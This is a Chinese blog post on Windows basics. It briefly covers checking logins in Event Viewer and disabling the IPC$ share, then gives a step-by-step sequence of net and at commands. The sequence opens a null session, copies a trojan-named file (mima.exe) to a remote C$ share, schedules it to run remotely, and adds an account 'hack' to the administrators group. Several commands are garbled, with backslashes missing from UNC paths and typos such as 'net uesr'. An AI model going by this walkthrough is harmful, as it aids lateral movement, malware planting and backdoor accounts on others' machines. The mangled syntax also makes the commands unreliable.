排查事件记录和共享文件-win上必备常识

简介:

我们日常的win系统出现问题,比如被盗被登录,事件记录是必看的,想要共享给局域网文件,又需要共享服务。下面我们来看看这些日常小知识吧。

事件查看器

事件查看器主要用于管理员的排除查看登录记录,黑客入侵退出时都会清空他的登录信息,以免追查。
_1

点击“事件查看器”可以看到事件点击后下面有详情。
以此排查具体问题。

共享文件夹

点击“共享文件夹”进入“共享”可以看到有个IPC$,在上面右键 停止共享。
_2

知识讲堂
IPC$:空连接,在目标计算机打开IPC$的情况下可以空连接上去查看对方文件夹,无需用户名和密码,现在安装系统大多都会自动关闭。
一般在拿下网站权限后在webshell执行他进一步控制服务器或者电脑上有人故意攻击偷偷开启。
net share ipc$
开放目标的 ipc$ 共享;
net share ipc$ /del
关闭目标的 ipc$ 共享;如果你要给它开共享文件夹,你可以用:
net share c=c:\
_3

Win+r 打开“运行”
输入cmd确定,之后打入命令开启c盘共享,通过net share看到已经成功开启了
执行如图操作 共享就会删除。
建立空连接 : net use \127.0.0.1ipc$"" /user:"" 连接上目标计算机
删除连接 :net use \127.0.0.1ipc$/del
连接成功后在 ipc$ 连接中对远程主机的操作命令
查看远程主机的共享资源(看不到默认共享) :net view \127.0.0.1
查看远程主机的当前时间 :net time \127.0.0.1
映射 / 删除远程共享 :net use z:\127.0.0.1c
此命令将共享名为 c 的共享资源映射为本地 z 盘
net use z: /del 删除映射的 z 盘,其他盘类推
向远程主机复制文件 :
copy路径 文件名\IP共享目录名,如:
copy c:mima.exe\127.0.0.1c$即将 c 盘下的 mima.exe 复制到对方 c 盘内
当然,你也可以把远程主机上的文件复制到自己的机器里:
copy \127.0.0.1c$mima.exe c:\
远程添加计划任务 :
at \IP时间 程序名 如:
at \127.0.0.0 11:00 mima.exe
注意:时间尽量使用 24 小时制;如果你打算运行的程序在系统默认搜索路径(比如 system32/ )下则不用加路径,否则必须加全路径

_4本地命令
查看本地主机的共享资源(可以看到本地的默认共享)
net share
得到本地主机的用户列表
net user
显示本地某用户的帐户信息
net user帐户名 比如net user administrator
显示本地主机当前启动的服务
net start
启动 / 关闭本地服务
net start 服务名 举例:net start services
net stop 服务名 举例:net stop services
在本地添加帐户
net user帐户名 密码 /add 举例:net user hack hack /add
激活禁用的用户
net uesr 帐户名/active:yes 举例:net user guest/active:yes
加入管理员组
net localgroup administrators帐户名/add
举例:net localgroup administrators hack/add 将hack添加到管理组

_5

相关文章
Vue3框架中让table合计居中对齐
Vue3框架中让table合计居中对齐
403 0
|
10月前
|
Java 调度 开发者
线程池
线程池是一种管理多个线程的技术,通过复用线程减少创建和销毁的开销,提高多线程编程效率。它帮助开发者简化线程管理,避免资源浪费和过度线程切换。Java中通过Executor框架实现线程池,核心类包括ExecutorService、ThreadPoolExecutor等,支持任务提交、调度及关闭操作。本文介绍其使用方法与内部架构。
235 3
|
监控 网络协议 Java
一些适合性能测试脚本编写和维护的工具
一些适合性能测试脚本编写和维护的工具
714 59
|
缓存 安全 Ubuntu
Linux配置代理上网
如何配置Linux代理
1448 1
|
缓存 安全 Linux
docker镜像管理问题
【10月更文挑战第3天】
317 1
|
分布式计算 大数据 Spark
Spark大数据处理:技术、应用与性能优化(全)PDF书籍推荐分享
《Spark大数据处理:技术、应用与性能优化》深入浅出介绍Spark核心,涵盖部署、实战与性能调优,适合初学者。作者基于微软和IBM经验,解析Spark工作机制,探讨BDAS生态,提供实践案例,助力快速掌握。书中亦讨论性能优化策略。[PDF下载链接](https://zhangfeidezhu.com/?p=347)。![Spark Web UI](https://img-blog.csdnimg.cn/direct/16aaadbb4e13410f8cb2727c3786cc9e.png#pic_center)
600 1
Spark大数据处理:技术、应用与性能优化(全)PDF书籍推荐分享
|
数据安全/隐私保护 智能硬件
智能家居系统入门指南
随着科技的飞速发展,智能家居系统已不再是遥不可及的梦想。本文将带你走进智能生活的世界,从基础概念到实用设备,再到搭建步骤和常见问题解答,全方位解析如何打造一个舒适、便捷、高效的智能居家环境。让我们一起探索,如何通过简单的操作,实现家居生活的智能化升级。
|
SQL 监控 NoSQL
乐观锁在分布式系统中如何实现
乐观锁在分布式系统中如何实现
303 0
|
数据可视化 算法 Java
生信教程:多序列比对
生信教程:多序列比对
|
监控 前端开发 JavaScript
使用JavaScript实现实时报警功能的办公电脑上网监控软件:前端代码
在今天的数字化时代,监控软件已成为许多组织和企业必不可少的一部分,用于保护数据和确保系统的正常运行。本文将介绍如何使用JavaScript编写前端监控软件,包括实时报警功能的实现。我们将探讨一些关键的代码示例,以展示如何构建这样的系统。最后,我们还会讨论如何自动将监控到的数据提交到一个网站。
589 4

热门文章

最新文章